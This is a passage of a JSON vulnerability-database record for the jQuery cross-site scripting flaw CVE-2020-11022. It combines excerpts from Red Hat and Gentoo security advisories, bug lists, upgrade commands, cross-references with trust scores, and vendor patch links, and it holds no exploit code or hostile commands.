ca-user-cert-add with secure port failed with \u0027SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT\u0027\n\n6. You can also manage\nuser accounts for web applications, mobile applications, and RESTful web\nservices. Description:\n\nRed Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Description:\n\nRed Hat Identity Management (IdM) is a centralized authentication, identity\nmanagement, and authorization solution for both traditional and cloud-based\nenterprise environments. Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1430365 - [RFE] Host-group names command rename\n1488732 - fake_mname in named.conf is no longer effective\n1585020 - Enable compat tree to provide information about AD users and groups on trust agents\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1651577 - [WebUI] IPA Error 3007: RequirmentError\" while adding members in \"User ID overrides\" tab\n1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute\n1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1701233 - [RFE] support setting supported signature methods on the token\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1746830 - Memory leak during search of idview overrides\n1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch\n1751295 - When sync-repl is enabled, slapi-nis can 
deadlock during retrochanglog trimming\n1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn\u0027t work in GUI (it works only from CLI)\n1759888 - Rebase OpenDNSSEC to 2.1\n1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED\n1777806 - When Service weight is set as 0 for server in IPA location \"IPA Error 903: InternalError\" is displayed\n1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service\n1801698 - [RFE] Changing default hostgroup is too easy\n1802471 - SELinux policy for ipa-custodia\n1809835 - RFE: ipa group-add-member: number of failed should also be emphasized\n1810154 - RFE: ipa-backup should compare locally and globally installed server roles\n1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time\n1813330 - ipa-restore does not restart httpd\n1816784 - KRA install fails if all KRA members are Hidden Replicas\n1818765 - [Rebase] Rebase ipa to 4.8.6+\n1818877 - [Rebase] Rebase to softhsm 2.6.0+\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831732 - AVC avc: denied { dac_override } for comm=\"ods-enforcerd\n1831935 - AD authentication with IdM against SQL Server\n1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11\n1833266 - [dirsrv] set \u0027nsslapd-enable-upgrade-hash: off\u0027 as this raises warnings\n1834264 - BIND rebase: rebuild against new so version\n1834909 - softhsm use-after-free on process exit\n1845211 - Rebase bind-dyndb-ldap to 11.3\n1845537 - IPA bind configuration issue\n1845596 - ipa trust-add fails with \u0027Fetching domains from trusted forest failed\u0027\n1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts\n1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7\n1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn\n1849914 - 
FreeIPA - Utilize 256-bit AJP connector passwords\n1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition\n1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2\n1853263 - ipa-selinux package missing\n1857157 - replica install failing with avc denial for custodia component\n1858318 - AttributeError: module \u0027ssl\u0027 has no attribute \u0027SSLCertVerificationError\u0027 when upgrading ca-less ipa master\n1859213 - AVC denial during ipa-adtrust-install --add-agents\n1863079 - ipa-epn command displays \u0027exception: ConnectionRefusedError: [Errno 111] Connection refused\u0027\n1863616 - CA-less install does not set required permissions on KDC certificate\n1866291 - EPN: enhance input validation\n1866938 - ipa-epn fails to retrieve user data if some user attributes are not present\n1868432 - Unhandled Python exception in \u0027/usr/libexec/ipa/ipa-pki-retrieve-key\u0027\n1869311 - ipa trust-add fails with \u0027Fetching domains from trusted forest failed\u0027\n1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less\n1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain\n1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. \n1879604 - pkispawn logs files are empty\n\n6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202007-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/ \u003chttps://security.gentoo.org/\u003e\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Cacti: Multiple vulnerabilities\n Date: July 26, 2020\n Bugs: #728678, #732522\n ID: 202007-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Cacti, the worst of which\ncould result in the arbitrary execution of code. 
\n\nBackground\n==========\n\nCacti is a complete frontend to rrdtool. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-analyzer/cacti \u003c 1.2.13 \u003e= 1.2.13\n 2 net-analyzer/cacti-spine\n \u003c 1.2.13 \u003e= 1.2.13\n -------------------------------------------------------------------\n 2 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Cacti. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Cacti users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-analyzer/cacti-1.2.13\"\n\nAll Cacti Spine users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=net-analyzer/cacti-spine-1.2.13\"\n\nReferences\n==========\n\n[ 1 ] CVE-2020-11022\n https://nvd.nist.gov/vuln/detail/CVE-2020-11022 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11022\u003e\n[ 2 ] CVE-2020-11023\n https://nvd.nist.gov/vuln/detail/CVE-2020-11023 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11023\u003e\n[ 3 ] CVE-2020-14295\n https://nvd.nist.gov/vuln/detail/CVE-2020-14295 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-14295\u003e\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202007-03 \u003chttps://security.gentoo.org/glsa/202007-03\u003e\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. 
Any security concerns should be addressed to\nsecurity@gentoo.org \u003cmailto:security@gentoo.org\u003e or alternatively, you may file a bug at\nhttps://bugs.gentoo.org \u003chttps://bugs.gentoo.org/\u003e. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5 \u003chttps://creativecommons.org/licenses/by-sa/2.5\u003e\n\n. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. Solution:\n\nBefore applying this update, ensure all previously released errata relevant\nto your system is applied. \n\nSee the following documentation, which will be updated shortly for release\n3.11.219, for important instructions on how to upgrade your cluster and\nfully\napply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_r\nelease_notes.html\n\nThis update is available via the Red Hat Network. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Red Hat Virtualization security, bug fix, and enhancement update\nAdvisory ID: RHSA-2020:3807-01\nProduct: Red Hat Virtualization\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3807\nIssue date: 2020-09-23\nCVE Names: CVE-2020-8203 CVE-2020-11022 CVE-2020-11023\n CVE-2020-14333\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat Virtualization Engine 4.4. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. 
A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch\n\n3. Description:\n\nThe org.ovirt.engine-root is a core component of oVirt. \n\nThe following packages have been upgraded to a later upstream version:\nansible-runner-service (1.0.5), org.ovirt.engine-root (4.4.2.3),\novirt-engine-dwh (4.4.2.1), ovirt-engine-extension-aaa-ldap (1.4.1),\novirt-engine-ui-extensions (1.2.3), ovirt-log-collector (4.4.3),\novirt-web-ui (1.6.4), rhvm-branding-rhv (4.4.5), rhvm-dependencies (4.4.1),\nvdsm-jsonrpc-java (1.5.5). (BZ#1674420, BZ#1866734)\n\nA list of bugs fixed in this update is available in the Technical Notes\nbook:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/ht\nml-single/technical_notes\n\nSecurity Fix(es):\n\n* nodejs-lodash: prototype pollution in zipObjectDeep function\n(CVE-2020-8203)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* jQuery: passing HTML containing \u003coption\u003e elements to manipulation methods\ncould result in untrusted code execution (CVE-2020-11023)\n\n* ovirt-engine: Reflected cross site scripting vulnerability\n(CVE-2020-14333)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* Cannot assign direct LUN from FC storage - grayed out (BZ#1625499)\n\n* VM portal always asks how to open console.vv even it has been set to\ndefault application. 
(BZ#1638217)\n\n* RESTAPI Not able to remove the QoS from a disk profile (BZ#1643520)\n\n* On OVA import, qemu-img fails to write to NFS storage domain (BZ#1748879)\n\n* Possible missing block path for a SCSI host device needs to be handled in\nthe UI (BZ#1801206)\n\n* Scheduling Memory calculation disregards huge-pages (BZ#1804037)\n\n* Engine does not reduce scheduling memory when a VM with dynamic hugepages\nruns. (BZ#1804046)\n\n* In Admin Portal, \"Huge Pages (size: amount)\" needs to be clarified\n(BZ#1806339)\n\n* Refresh LUN is using host from different Data Center to scan the LUN\n(BZ#1838051)\n\n* Unable to create Windows VM\u0027s with Mozilla Firefox version 74.0.1 and\ngreater for RHV-M GUI/Webadmin portal (BZ#1843234)\n\n* [RHV-CNV] - NPE when creating new VM in cnv cluster (BZ#1854488)\n\n* [CNV\u0026RHV] Add-Disk operation failed to complete. (BZ#1855377)\n\n* Cannot create KubeVirt VM as a normal user (BZ#1859460)\n\n* Welcome page - remove Metrics Store links and update \"Insights Guide\"\nlink (BZ#1866466)\n\n* [RHV 4.4] Change in CPU model name after RHVH upgrade (BZ#1869209)\n\n* VM vm-name is down with error. Exit message: unsupported configuration:\nCan\u0027t add USB input device. USB bus is disabled. (BZ#1871235)\n\n* spec_ctrl host feature not detected (BZ#1875609)\n\nEnhancement(s):\n\n* [RFE] API for changed blocks/sectors for a disk for incremental backup\nusage (BZ#1139877)\n\n* [RFE] Improve workflow for storage migration of VMs with multiple disks\n(BZ#1749803)\n\n* [RFE] Move the Remove VM button to the drop down menu when viewing\ndetails such as snapshots (BZ#1763812)\n\n* [RFE] enhance search filter for Storage Domains with free argument\n(BZ#1819260)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1625499 - Cannot assign direct LUN from FC storage - grayed out\n1638217 - VM portal always asks how to open console.vv even it has been set to default application. \n1643520 - RESTAPI Not able to remove the QoS from a disk profile\n1674420 - [RFE] - add support for Cascadelake-Server CPUs (and IvyBridge)\n1748879 - On OVA import, qemu-img fails to write to NFS storage domain\n1749803 - [RFE] Improve workflow for storage migration of VMs with multiple disks\n1758024 - Long running Ansible tasks timeout and abort for RHV-H hosts with STIG/Security Profiles applied\n1763812 - [RFE] Move the Remove VM button to the drop down menu when viewing details such as snapshots\n1778471 - Using more than one asterisk in LDAP search string is not working when searching for AD users. \n1787854 - RHV: Updating/reinstall a host which is part of affinity labels is removed from the affinity label. \n1801206 - Possible missing block path for a SCSI host device needs to be handled in the UI\n1803856 - [Scale] ovirt-vmconsole takes too long or times out in a 500+ VM environment. \n1804037 - Scheduling Memory calculation disregards huge-pages\n1804046 - Engine does not reduce scheduling memory when a VM with dynamic hugepages runs. 
\n1806339 - In Admin Portal, \"Huge Pages (size: amount)\" needs to be clarified\n1816951 - [CNV\u0026RHV] CNV VM migration failure is not handled correctly by the engine\n1819260 - [RFE] enhance search filter for Storage Domains with free argument\n1826255 - [CNV\u0026RHV]Change name of type of provider - CNV -\u003e OpenShift Virtualization\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831949 - RESTAPI javadoc contains missing information about assigning IP address to NIC\n1831952 - RESTAPI contains malformed link around JSON representation fo the cluster\n1831954 - RESTAPI javadoc contains malformed link around oVirt guest agent\n1831956 - RESTAPI javadoc contains malformed link around time zone representation\n1838051 - Refresh LUN is using host from different Data Center to scan the LUN\n1841112 - not able to upload vm from OVA when there are 2 OVA from the same vm in same directory\n1843234 - Unable to create Windows VM\u0027s with Mozilla Firefox version 74.0.1 and greater for RHV-M GUI/Webadmin portal\n1850004 - CVE-2020-11023 jQuery: passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1854488 - [RHV-CNV] - NPE when creating new VM in cnv cluster\n1855377 - [CNV\u0026RHV] Add-Disk operation failed to complete. \n1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function\n1858184 - CVE-2020-14333 ovirt-engine: Reflected cross site scripting vulnerability\n1859460 - Cannot create KubeVirt VM as a normal user\n1860907 - Upgrade bundled GWT to 2.9.0\n1866466 - Welcome page - remove Metrics Store links and update \"Insights Guide\" link\n1866734 - [DWH] Rebase bug - for the 4.4.2 release\n1869209 - [RHV 4.4] Change in CPU model name after RHVH upgrade\n1869302 - ansible 2.9.12 - host deploy fixes\n1871235 - VM vm-name is down with error. Exit message: unsupported configuration: Can\u0027t add USB input device. 
USB bus is disabled. \n1875609 - spec_ctrl host feature not detected\n1875851 - Web Admin interface broken on Firefox ESR 68.11\n\n6. Package List:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:\n\nSource:\nansible-runner-service-1.0.5-1.el8ev.src.rpm\novirt-engine-4.4.2.3-0.6.el8ev.src.rpm\novirt-engine-dwh-4.4.2.1-1.el8ev.src.rpm\novirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.src.rpm\novirt-engine-ui-extensions-1.2.3-1.el8ev.src.rpm\novirt-log-collector-4.4.3-1.el8ev.src.rpm\novirt-web-ui-1.6.4-1.el8ev.src.rpm\nrhvm-branding-rhv-4.4.5-1.el8ev.src.rpm\nrhvm-dependencies-4.4.1-1.el8ev.src.rpm\nvdsm-jsonrpc-java-1.5.5-1.el8ev.src.rpm\n\nnoarch:\nansible-runner-service-1.0.5-1.el8ev.noarch.rpm\novirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-backend-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-dbscripts-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-dwh-4.4.2.1-1.el8ev.noarch.rpm\novirt-engine-dwh-grafana-integration-setup-4.4.2.1-1.el8ev.noarch.rpm\novirt-engine-dwh-setup-4.4.2.1-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-setup-1.4.1-1.el8ev.noarch.rpm\novirt-engine-health-check-bundler-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-restapi-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-base-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-cinderlib-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-imageio-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-common-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-tools-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-tools-backup-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-ui-extensions-1.2.3-1.el8ev.noarch.rpm\novirt-engine-vmconsole-proxy-helper-4.4.2.3-0.6.e
l8ev.noarch.rpm\novirt-engine-webadmin-portal-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-log-collector-4.4.3-1.el8ev.noarch.rpm\novirt-web-ui-1.6.4-1.el8ev.noarch.rpm\npython3-ovirt-engine-lib-4.4.2.3-0.6.el8ev.noarch.rpm\nrhvm-4.4.2.3-0.6.el8ev.noarch.rpm\nrhvm-branding-rhv-4.4.5-1.el8ev.noarch.rpm\nrhvm-dependencies-4.4.1-1.el8ev.noarch.rpm\nvdsm-jsonrpc-java-1.5.5-1.el8ev.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-8203\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/cve/CVE-2020-11023\nhttps://access.redhat.com/security/cve/CVE-2020-14333\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX2t0HtzjgjWX9erEAQhpWg/+KolNmhmQCrst8TmYsC2IgSdHP+q0LKLj\ngdPZYu0ixOpwLLiAhrsoDXqL3H3w7UDSKkSISgPMEqEde4Vp+zI37O1q3E/P7CAj\nrfLGuL1UDEiy0q0g1BP13GrPlg6K4fR5wQAnTB6vD/ZY+wd50Z0T+NGAxd2w68bM\nR5q1kSOUPc4AZt25FORU2cmp775Y7DWazMWHC77uiJHgyCwVqLtdO09iEnglZDKJ\nBynwyT8exZKXxmmpE4QZ4X7wNo3Y0mTiRZo5eyxxQpwj9X+qw1V+pBdtMH/C1yhk\nJ+X1f+wDoe2jCx2bqPXqp6EgFSHnJNt96jV0oTdD0f8rMgWcBDStNXdagPBmBCBp\nt+Kq3BZx0Oqkig4f+DCEmoS0V0fB9UQLg0Q/M9p1bTfYQkbn+BMHL7CAp8UyAzPH\nA1HlnP7TtQgplFvoap82xt2pXh97VvI6x3sBGHyW4Fz0SykhRYx3dAgmqy5nEssl\n5ApWZ87M3l+2tUh4ZOJAtzRDt9sL5KQsXjp1jZaK/gWBsL4Suzr9AIrs4NmRmXnY\nTzxdXgIY6C+dWmB4TPhcJE5etcvtorqvs93d47yBdpRyO/IlbEw0vLUBdVZZuj9N\nmqp6RcHqDKm6Yv4B73Ud5my44wSRWVWtBxO6fivQOQG7iqCyIlA3M3LUMkVy+fxc\nbvmOI0eIsZw=Jhpi\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11022"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11022",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "162159",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2021-02",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2020-10",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2020-11",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2021-10",
"trust": 1.2
},
{
"db": "ICS CERT",
"id": "ICSA-22-055-02",
"trust": 0.9
},
{
"db": "JVN",
"id": "JVNVU99843134",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94912830",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94847990",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94973485",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-25-182-07",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-22-342-02",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-22-097-01",
"trust": 0.8
},
{
"db": "CERT@VDE",
"id": "VDE-2021-027",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "171212",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171215",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159852",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159876",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159275",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "157850",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158555",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170823",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171214",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160274",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170821",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159353",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161727",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170819",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168304",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170817",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158750",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159513",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2429",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163559",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-11022",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"id": "VAR-202004-2191",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:54:02.528000Z",
"patch": {
"_id": null,
"data": [
{
"title": "hitachi-sec-2020-130",
"trust": 0.8,
"url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 3.11 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202217 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-4693-1 drupal7 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=978f239ce60a8a08c53eb64ba189d0f6"
},
{
"title": "Red Hat: Moderate: Red Hat AMQ Interconnect 1.9.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204211 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Virtualization security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203807 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Service Mesh security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202362 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7.4-1 - RHEL7 Container",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205249 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: wordpress: WordPress 5.9.2 security and maintenance release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=e7014c0a68e8d9bc31a54125059176dc"
},
{
"title": "Red Hat: Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226393 - Security Advisory"
},
{
"title": "Red Hat: Moderate: ipa security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203936 - Security Advisory"
},
{
"title": "Red Hat: Important: RHV Manager (ovirt-engine) 4.4 security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203247 - Security Advisory"
},
{
"title": "Red Hat: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204670 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.4.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202813 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Nessus 8.13.0 Fixes One Third-party Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2020-10"
},
{
"title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=0c6e8f969487f201b1d56f59bd98f443"
},
{
"title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=e57a04f097f54c762da82263eadc1b8a"
},
{
"title": "Red Hat: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204847 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Nessus Network Monitor 5.13.0 Fixes One Third-party Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2021-02"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230556 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230554 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Tenable.sc 5.17.0 Fixes Multiple Vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2020-11"
},
{
"title": "Amazon Linux 2: ALAS2-2020-1519",
